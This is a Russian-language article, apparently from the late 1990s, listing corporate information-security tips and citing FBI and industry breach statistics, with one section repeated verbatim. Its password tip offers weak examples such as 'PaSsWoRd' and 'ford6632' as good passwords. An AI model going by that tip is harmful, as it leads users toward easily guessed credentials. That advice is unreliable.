6. Немедленно устанавливайте все новые версии операционных систем, "заплаты" к прикладным программам и комплекты сервисов, выпускаемые производителем программного обеспечения. Тщательно проверяйте, не окажет ли новая программа негативного воздействия на другие системы. 7. Создайте из сотрудников вашей компании оперативную группу компьютерной безопасности (Computer Emergency Response Team, CERT). CERT - это общепринятый термин для обозначения группы экспертов по компьютерным технологиям, которые призваны бороться с компьютерными и сетевыми катастрофами. Установите контакты с группами CERT из родственных организаций, что позволит поддерживать устойчивость системы защиты в более глобальном масштабе.
8. Просматривайте списки прав доступа пользователей и следите за их актуальностью. Ограничивайте пользователям возможности доступа; максимально закручивайте все гайки в системе безопасности.
9. Рассматривайте защиту данных как процесс. Не следует думать, что установив систему защиты данных, можно поставить галочку в списке необходимых дел и на этом успокоиться. Разработайте политику поддержания корпоративной информационной безопасности, которая соответствовала бы потребностям вашего бизнеса.
Сигнал тревоги
В настоящее время ФБР расследует более 700 случаев крупных вмешательств со стороны иностранных разведок. Среди применяемых агентами методов - подключение к кабельным линиям связи, установка подслушивающих устройств в офисах, перехват разговоров по сотовому телефону, проникновение в компьютерные сети и воровство закрытой информации с дисков и компакт-дисков.
По данным Национальной ассоциации компьютерной безопасности, за период с 1996 г. по ноябрь 1997 г. количество макровирусов возросло с 40 до 1300. Gartner Group предсказывает, что в 1998 г. 60% нарушений системы защиты произойдет из-за вирусов.
Иностранные агенты минимум из 23 стран пытались осуществить разведывательные действия против американских корпораций. По данным ФБР, только в 1997 г. потери американских компаний, связанные с интеллектуальной собственностью, составили свыше 300 млрд дол.
По данным министерства обороны США, 88% из более чем 20 000 попыток проникновения в информационные системы государственных организаций, выполненных для оценки надежности защиты, завершились успешно. Из этих успешных нападений обнаружены были только 5%; официальные же доклады о проникновении представлялись только в 5% от общего числа случаев выявления атак. Таким образом, широкой общественности становится известно лишь об одной из 400 успешных атак.
Как показало исследование, проведенное компанией Warroom Research совместно с американским Сенатом, 58% компаний обнаруживали случаи несанкционированного доступа к своим сетям. Более чем в 69% случаев успешных вторжений убытки компаний составили свыше 50 тыс. дол., а более чем в 27% случаев - свыше 500 тыс. дол.
Исследование, проведенное компанией Warroom Research, показало, что каждая из более чем 51% компаний уличала не менее шести своих сотрудников в злоупотреблениях, связанных с информационными сетями. Более чем в 75% случаев единственным наказанием стало устное или письменное порицание.
Экзамены никогда не кончаются
Когда нанятым хакерам удалось взломать систему, ваша работа только начинается. Ни в коем случае не следует считать, что сам факт тестирования уже обеспечивает информационную безопасность. Оценка системы безопасности (вроде той, что мы предприняли по заказу BABank) дает только представление о состоянии сети на момент проведения операции. Cистема информационной безопасности претерпевает постоянные изменения и требует к себе постоянного внимания.
Первый всеобъемлющий тест должен рассматриваться вами как отправная точка. Не забывайте время от времени выделять деньги на повторные обследования. Не менее важно и то, чтобы исследования проводились до запуска онлайновых услуг, а не после того, как "дыры" в защите дадут себя знать.
Не забывайте девиз "Взломай свою систему сам, пока кто-то не сделает этого без твоего ведома". А пока - удачной охоты!
Десять советов по защите серверов для Web-коммерции
1. Следует ограничить число людей, имеющих удаленный доступ к управлению вашим Web-сервером, и тщательно следить за этим доступом. Дистанционное администрирование (как и доступ к корневому каталогу) - отличная лазейка для хакера.
2. Проверьте, правильно ли сконфигурированы списки доступа и вносятся ли в них каждодневные изменения, отражающие состояние деловой жизни компании (такие, например, как добавление новых пользователей и клиентов, удаление старых ).
3. Насколько возможно, отделите ваш коммерческий сервер от прочих услуг. Можно дополнительно укрепить сервер, отменив все необязательные функции приложений и операционных систем. Если вы не в состоянии этого сделать, следует всерьез подумать об использовании сторонних услуг (outsourcing).
4. Установите систему обнаружения вторжений, которая немедленно будет ставить в известность администратора сети обо всех проблемах, требующих устранения. Помните, что обнаружить хакера - это полдела; главная задача состоит в пресечении его деятельности.
5. Система должна реагировать на любые необычные события, происходящие на серверах. Невозможно остановить злоумышленника, не зная, что он делает.
6. Неправильно написанные, сконфигурированные и установленные скрипты Perl и CGI (Common Gateway Interface) могут стать причиной возникновения "дыр" в системе защиты. Этими средствами надо пользоваться осторожно; все скрипты должны проверяться опытными специалистами.
7. Для обеспечения безопасности некоторых коммерческих серверов использования паролей недостаточно. Стоит обдумать возможность раздачи клиентам физических и электронных жетонов (они стоят примерно 50 дол. за штуку).
8. Следует обеспечивать и аутентификацию администраторов. Все большее распространение получают различные биометрические средства идентификации по голосу, отпечаткам пальцев и узору сетчатки (они стоят примерно по 300 дол. в расчете на одного пользователя).
9. При переводе денежных сумм (с использованием кредитных карточек или путем обращения к мэйнфрейму, где поддерживаются полномасштабные банковские операции) ваш узел обращается к другим сетям. При взаимодействии с критически важными системами следует применять такие средства обеспечения безопасности, как Secure Socket Layer, Secure Hypertext Transfer Protocol или Kerberos.
10. Подумайте, не стоит ли снабдить критически важные данные и соответствующие им системные файлы оболочками для обеспечения их целостности. Криптографические оболочки вокруг этих файлов позволят не допустить их модификации или внесения вредоносного кода.
Как работать с группой, оценивающей надежность системы информационной безопасности
Выберите себе консультанта с хорошей репутацией Потребуйте, чтобы в группе велись подробные контрольные журналы в течение всего срока работ Необходимо, чтобы группа оценки могла приостановить свою деятельность за несколько минут, если начнет происходить нечто нежелательное Группа должна выдать несколько различных отчетов, рассчитанных на технических специалистов, руководителей среднего звена и высшее руководство компаний Ознакомьтесь с результатами проверки и используйте их как руководство к действию
Десять недорогих способов укрепления системы обеспечения внутренней безопасности
1. Стоит выяснить о нанимаемых на работу людях несколько больше, чем можно узнать из их резюме; особенно это касается таких критически важных должностей, как системный администратор. Подумайте, не надо ли ввести систему психотестов, которые позволят выявить этические принципы кандидатов, их особенности.
2. Рассмотрите вопрос о снятии дисководов с пользовательских ПК. Это затруднит сотрудникам установку своего собственного программного обеспечения и компьютерных игр, помешает им заражать систему вирусами и "выносить" из компании закрытую информацию. Такая мера позволит избежать и еще одной угрозы для информационной безопасности - диски, разбросанные на столе сотрудника, легко могут пропасть.
3. Не допускайте, чтобы на одну сетевую станцию приходилось более одного идентификатора пользователя. Установите безопасные экранные заставки - это поможет решить административные проблемы.
4. Предоставляйте корневые привилегии только тем администраторам, которым они реально нужны. Помните, что каждый раз, когда вы даете такие привилегии, в системе защиты появляется еще одна потенциальная "дырка".
5. Уничтожайте или сжигайте важную закрытую информацию: списки персонала, идентификационные имена сотрудников, сводки отдела кадров, папки с данными о клиентах, памятки, руководства, схемы сетей и вообще все, что может представлять интерес для злоумышленников.
6. Мусорные контейнеры должны находиться на территории организации; в противном случае злоумышленник не устоит перед соблазном в них порыться.
7. Постарайтесь, чтобы сотрудники компании стали вашими союзниками в борьбе за корпоративную безопасность. Попробуйте реализовать программы партнерства: пообещайте вознаграждение тому, кто обнаружит недочеты в системе безопасности или уличит кого-либо в недобросовестности.
8. Внимательно изучайте все продукты, обеспечивающие информационную безопасность. Убедитесь, что они работают именно так, как было обещано производителем. Подумайте, можно ли укрепить систему защиты, не устанавливая новый продукт, который потребует от вас определенных усилий.
9. Уполномочьте кого-либо из сотрудников принимать оперативные меры в случае угрозы информационной безопасности - от аварийной остановки Web-сервера до вызова охраны для удаления проштрафившегося сотрудника за пределы организации.
10. Оповестите сотрудников, что вы используете самые современные средства мониторинга сети и контроля за действиями работников компании. Объясните, что вы не собираетесь устанавливать тоталитарный режим, а просто боретесь со злоумышленниками. В результате, сотрудники будут с меньшей легкостью нарушать правила пользования информационной системой и обеспечения защиты данных.
Пять основных условий обеспечения информационной безопасности
1. Главное, что нужно сделать для защиты информационной системы от внешних и внутренних угроз, - выработать корпоративную политику. Обдумайте, чего вы хотите добиться и как можно достичь поставленной цели; составьте ясный документ, посвященный политике защиты.
2. Регулярно проводите занятия с сотрудниками, повышая их образовательный уровень и степень информированности обо всех аспектах информационной безопасности компании. Объясняйте сотрудникам, в чем могло бы состоять их участие в обеспечении информационной безопасности компании.
3. Периодически проводите тестирование и оценку системы защиты, чтобы проверить, насколько внешняя и внутренняя защита соответствует корпоративной политике. Работайте только с теми консультантами, которые придерживаются структурированного подхода и не заинтересованы напрямую в результатах тестирования.
4. Не забывайте о простых способах физической защиты. Следите за доступом к распределительным шкафам, серверам, комнатам телефонной связи и кроссам точно так же, как вы следите за доступом к вычислительным центрам.
5. Рассмотрите вопрос об использовании услуг сторонних компаний, специализирующихся в области защиты данных; они должны работать в контакте с отделом автоматизации. Эти компании могут оказаться лучше подготовленными к тому, чтобы следить за защитой ваших данных 24 часа в сутки без выходных. Однако тогда вам придется передать в чужие руки управление определенной частью своего бизнеса.
Десять способов поддержки работоспособности системы защиты
1. Время от времени проводите тестирование систем защиты - это позволит отслеживать все изменения в самих системах, сетях и поведении пользователей. Точечные проверки системы защиты данных предприятия стоит проводить ежемесячно, а полную проверку информационной безопасности предприятия - раз в год. Возможное влияние новых приложений на информационную безопасность следует оценивать перед их установкой.
2. Постоянно проверяйте надежность парольной защиты, даже если ничто не внушает беспокойства. Длинные пароли лучше коротких, поскольку их труднее подобрать, однако их и труднее запомнить, не записывая. Вот примеры хороших паролей: PaSsWoRd (чередующиеся прописные и строчные буквы), ford6632 (распространенное слово и легко запоминающееся число), 3lite, wr1t3m3, w1nn13 (так пишут хакеры).
3. Следите за тем, как ваши пользователи работают с Internet, и регулируйте этот процесс.
4. В рамках программы непрерывного образования предложите сотрудникам ознакомиться со специальными играми и моделирующими программами, которые позволят им осознать, какие последствия может иметь пренебрежение правилами защиты данных.
5. За счет использования механизмов управления доступом и технологий для интрасетей разделите вашу организацию на логические части. Секционирование ресурсов и информации повышает степень защищенности. Подумайте также об использовании закрытой почтовой системы, ограничивающей возможность обмена информацией между сотрудниками.
6. Немедленно устанавливайте все новые версии операционных систем, "заплаты" к прикладным программам и комплекты сервисов, выпускаемые производителем программного обеспечения. Тщательно проверяйте, не окажет ли новая программа негативного воздействия на другие системы. 7. Создайте из сотрудников вашей компании оперативную группу компьютерной безопасности (Computer Emergency Response Team, CERT). CERT - это общепринятый термин для обозначения группы экспертов по компьютерным технологиям, которые призваны бороться с компьютерными и сетевыми катастрофами. Установите контакты с группами CERT из родственных организаций, что позволит поддерживать устойчивость системы защиты в более глобальном масштабе.
8. Просматривайте списки прав доступа пользователей и следите за их актуальностью. Ограничивайте пользователям возможности доступа; максимально закручивайте все гайки в системе безопасности.
9. Рассматривайте защиту данных как процесс. Не следует думать, что установив систему защиты данных, можно поставить галочку в списке необходимых дел и на этом успокоиться. Разработайте политику поддержания корпоративной информационной безопасности, которая соответствовала бы потребностям вашего бизнеса.
Сигнал тревоги
В настоящее время ФБР расследует более 700 случаев крупных вмешательств со стороны иностранных разведок. Среди применяемых агентами методов - подключение к кабельным линиям связи, установка подслушивающих устройств в офисах, перехват разговоров по сотовому телефону, проникновение в компьютерные сети и воровство закрытой информации с дисков и компакт-дисков.
По данным Национальной ассоциации компьютерной безопасности, за период с 1996 г. по ноябрь 1997 г. количество макровирусов возросло с 40 до 1300. Gartner Group предсказывает, что в 1998 г. 60% нарушений системы защиты произойдет из-за вирусов.
Иностранные агенты минимум из 23 стран пытались осуществить разведывательные действия против американских корпораций. По данным ФБР, только в 1997 г. потери американских компаний, связанные с интеллектуальной собственностью, составили свыше 300 млрд дол.
По данным министерства обороны США, 88% из более чем 20 000 попыток проникновения в информационные системы государственных организаций, выполненных для оценки надежности защиты, завершились успешно. Из этих успешных нападений обнаружены были только 5%; официальные же доклады о проникновении представлялись только в 5% от общего числа случаев выявления атак. Таким образом, широкой общественности становится известно лишь об одной из 400 успешных атак.
Как показало исследование, проведенное компанией Warroom Research совместно с американским Сенатом, 58% компаний обнаруживали случаи несанкционированного доступа к своим сетям. Более чем в 69% случаев успешных вторжений убытки компаний составили свыше 50 тыс. дол., а более чем в 27% случаев - свыше 500 тыс. дол.
Исследование, проведенное компанией Warroom Research, показало, что каждая из более чем 51% компаний уличала не менее шести своих сотрудников в злоупотреблениях, связанных с информационными сетями. Более чем в 75% случаев единственным наказанием стало устное или письменное порицание.
Подписаться на:
Сообщения (Atom)
